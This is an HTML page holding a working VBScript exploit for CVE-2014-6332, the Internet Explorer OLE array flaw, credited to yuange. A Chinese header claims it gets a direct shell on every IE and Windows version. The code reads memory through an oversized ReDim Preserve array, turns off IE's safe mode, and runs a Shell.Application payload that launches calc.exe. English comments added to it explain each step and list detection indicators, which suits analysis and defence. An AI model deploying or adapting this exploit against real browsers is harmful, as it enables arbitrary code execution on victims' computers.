CVE-2014-6332 alliedve.htm @ 11/12/2014

学习类
from: http://hi.baidu.com/yuange1975/item/c846a94d76fe00a861d7b900

经验证,任何版本IE,任何版本windows系统,直接shell。
//*
  allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
  https://twitter.com/yuange75
  http://hi.baidu.com/yuange1975
*//
<!doctype html>
<html>
<!-- Requests IE8 emulation for the page (X-UA-Compatible). Note the tag sits
     outside <head>; a forced legacy document mode on a page that also embeds
     VBScript is a content-inspection indicator worth flagging. -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
  ' Proof-of-concept payload, called at the end of setnotsafemode():
  ' instantiates Shell.Application and launches calc.exe.
  ' Detection note: CreateObject("Shell.Application") followed by
  ' ShellExecute from browser-hosted VBScript is the behavioural tell.
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "calc.exe"
end function
</script>

<SCRIPT LANGUAGE="VBScript">
' Script-level state shared by every function in this block.
dim  aa()          ' dynamic array, repeatedly resized with ReDim Preserve
dim  ab()          ' second dynamic array; ab(0)/ab(2)/ab(4) are written below
dim  a0            ' current upper bound used for aa/ab (advanced in Over)
dim  a1            ' a0+2, set in Over()
dim  a2            ' a0+&h8000000, set in Over(); an oversized bound
dim  win9x         ' set to 1 in Over() when type1=&hB9AD
dim  intVersion    ' IE major version parsed from the user agent in Begin()
dim  rnda          ' declared but never used on this page
dim  funclass      ' declared but never used on this page
dim  myarray       ' 12-character chrw() string built in Begin()
' Entry point: runs as soon as this script block is parsed.
Begin()

function Begin()
  ' Entry point. Gates on the user agent, initialises state, probes with
  ' Create(), then branches on the parsed IE version.
  On Error Resume Next
  info=Navigator.UserAgent
  ' Nothing runs on 64-bit IE ("Win64" in the user agent).
  if(instr(info,"Win64")>0)  then
    exit  function
  end if
  ' Takes the two characters after "MSIE " as the major version; agents
  ' without an "MSIE" token exit here.
  if (instr(info,"MSIE")>0)  then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit  function
  end if
  win9x=0
  BeginInit()
  if Create()=True then
    ' 12 16-bit values; later written into aa(a1+2) by mydata().
    myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    if(intVersion<4) then
      ' Legacy path: runshellcode() is not defined anywhere on this page,
      ' so under On Error Resume Next the call fails silently and this
      ' branch only emits the document.write output.
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

function BeginInit()
  ' Seeds the RNG and picks randomised starting bounds. rnd(6) and rnd(5)
  ' each return a value in [0,1), so a0 lands in [13,30) and a3 in [7,10);
  ' both are non-integer doubles at this point and are coerced by the
  ' later ReDim/CInt calls.
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

function Create()
  ' Retries Over() up to 401 times (i = 0..400) and returns True on the
  ' first success; Over() advances a0 on every attempt.
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
  if Over()=True then
    '  document.write(i)
    Create=True
    Exit For
  end if
  Next
end function

' Empty sub; mydata() assigns it to a local (i=testaa) and then nulls it.
sub testaa()
end sub

function mydata()
  ' Writes myarray into aa(a1+2) while specific double constants are
  ' stored in ab(0)/ab(2), then returns aa(a1). Requires a0/a1/a2 to have
  ' been set by Over(). NOTE(review): the pattern "ReDim Preserve to the
  ' oversized bound a2, write literal doubles into ab, access aa(a1..),
  ' ReDim Preserve back to a0" recurs in setnotsafemode() and ReadMemo()
  ' and is the signature of this CVE-2014-6332 technique.
  On Error Resume Next
  i=testaa
  i=null
  redim  Preserve aa(a2)        ' grow to a2 (= a0+&h8000000)
  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314   ' literal double written between the accesses
  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim  Preserve aa(a0)        ' shrink back before returning
end function

function setnotsafemode()
  ' Follows a chain of ReadMemo() values starting from mydata()'s result,
  ' scans a &h60-byte window in 4-byte steps for the value 14, and on a hit
  ' stores ab(4) through the aa(a1+2) element at offset &h11c+k (4 less
  ' than the &h120+k that was read). Then calls the runmumaa() payload.
  ' The function name suggests it toggles a "safe mode" setting; nothing
  ' on this page shows what the offsets refer to, so treat that as inferred.
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)          ' result unused: overwritten on the first loop pass
  for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
      j=0
      redim  Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)   ' indexed write through the element mydata() set to myarray
      redim  Preserve aa(a0)
      j=0
      j=readmemo(i+&h120+k)    ' re-reads the slot; the value is never checked
      Exit for
    end if
  next
  ab(2)=1.69759663316747E-313
  runmumaa()                    ' payload: Shell.Application -> calc.exe
end function

function Over()
  ' One probe attempt; Create() repeats it. Advances a0 by a3, derives
  ' a1=a0+2 and a2=a0+&h8000000, resizes aa/ab, writes a double into ab(0)
  ' and 10 into aa(a0), then inspects VarType of aa(a1-1)/aa(a1).
  ' Over=True only when VarType(aa(a1)) equals one of two magic values,
  ' &h2f66 or &hB9AD (the latter also sets win9x=1).
  ' Defender note: ReDim Preserve to an oversized bound under
  ' On Error Resume Next, followed by VarType checks against hex
  ' constants, is the observable tell of CVE-2014-6332 (patched by the
  ' Windows OLE update in MS14-064).
  On Error Resume Next
  dim type1,type2,type3          ' type2/type3 are declared but never used
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000                ' oversized upper bound (a0 + 2^27)
  redim  Preserve aa(a0)
  redim  ab(a0)
  redim  Preserve aa(a2)
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  if(IsObject(aa(a1-1)) = False) then
    if(intVersion<4) then
      ' Legacy (IE<4) variant: compares VarType against a size derived from a0.
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0)  then
          if(IsObject(aa(a1)) = False ) then
            type1=VarType(aa(a1))
          end if
        end if
      else
        redim  Preserve aa(a0)
        exit  function
      end if
    else
      ' IE>=4: no size check, only non-empty and non-object tests.
      if(vartype(aa(a1-1))<>0)  then
        if(IsObject(aa(a1)) = False ) then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if
  if(type1=&h2f66) then
    Over=True
  end if
  if(type1=&hB9AD) then
    Over=True
    win9x=1
  end if
  redim  Preserve aa(a0)         ' always shrink back, success or not
end function

function ReadMemo(add)
  ' Stores add+4 into aa(a1) using the same ReDim/ab(0) pattern as mydata()
  ' and returns lenb(aa(a1)), the byte length the engine reports for that
  ' element; the callers treat that value as a memory read (hence the name).
  ' add: numeric offset supplied by setnotsafemode().
  On Error Resume Next
  redim  Preserve aa(a2)
  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313  ' same literal double that setnotsafemode() writes into ab(2)
  ReadMemo=lenb(aa(a1))
  ab(0)=0
  redim  Preserve aa(a0)
end function
</script>
</body>
</html>